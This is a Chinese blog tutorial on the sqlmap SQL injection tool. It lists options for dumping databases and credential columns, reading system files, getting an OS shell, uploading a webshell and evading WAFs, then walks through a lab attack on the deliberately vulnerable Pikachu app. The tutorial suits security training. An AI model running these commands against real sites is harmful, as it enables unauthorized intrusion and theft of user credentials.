9sqlmap工具使用简介

Posted 2021-05-30 流失流逝

一、sqlmap工具命令

-r 指定参数post注入 sqlmap.py -r post.txt -p 注入参数

-u get注入，后面直接接一个url连接

--level = LEVEL 执行测试的等级（1-5，默认为1）,使用–level 参数且数值>=2的时候也会检查cookie里面的参数，当>=3的时候将检查User-agent和Referer。

--risk = RISK 执行测试的风险（0-3，默认为1）,默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。

-v ERBOSE信息级别: 0-6 （缺省1），其值具体含义：“0”只显示python错误以及严重的信息；1同时显示基本信息和警告信息（默认）；“2”同时显示debug信息；“3”同时显示注入的payload；“4”同时显示HTTP请求；“5”同时显示HTTP响应头；“6”同时显示HTTP响应页面；如果想看到sqlmap发送的测试payload最好的等级就是3。

-p -p 后面接参数，针对单个参数注入

-threads 线程数，如果你想让sqlmap跑的更快，可以更改这个线程 数的值，默认值为10

-batch-smart 智能判断测试

--mobile 模拟测试手机环境站点

-m 批量注入

注入获取命令： --dbs //默认情况系sqlmap会自动的探测web应用后端的数据库类型：mysql、Oracle、PostgreSQL、MicrosoftSQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAPMaxDB、DB2
--current-user：大多数数据库中可检测到数据库管理系统当前用户
--current-db：当前连接数据库名
--is-dba：判断当前的用户是否为管理
--users：列出数据库所有用户

获取表名 --tables -D 数据库名

字段名 --columns -T user -D abc

数据内容 -T user -C username,password,email --dump

读文件内容 --file-read /etc/password

系统交互的shell --os-shell

写webshell --file-write "c:/2.txt” --file-dest “C:/php/htdocs/sql.php” -v1 /将/software/nc.exe文件上传到C:/WINDOWS/Temp下/

sqlmap过waf --tamper ""

二、实验案例

实验环境使用 pikachu ，确定网站存在post漏洞，在网站上输入“1”，使用burp suite抓取数据包，把数据包放到D盘下，命名 1.txt。

1、查询可以利用的漏洞

sqlmap.py -r d:\\1.txt

红框中的内容为sqlmap从存储的会话中恢复的注入点，并分别描述了type（注入类型），title和payload。

2、获取数据库管理系统当前用户

sqlmap.py -r d:\\1.txt --current-user

3、获取当前连接数据库名

sqlmap.py -r d:\\1.txt --current-db

4、判断当前用户是否为管理员用户

sqlmap.py -r d:\\1.txt --is-dba

5、列出数据库所有用户

qlmap.py -r d:\\1.txt --users

6、获取表名

sqlmap.py -r d:\\1.txt --tables -D pikachu

7、获取字段名

sqlmap.py -r d:\\1.txt --columns -T users -D pikachu

八、获取数据内容

sqlmap.py -r d:\\1.txt --dump -T users -C username,password,id,level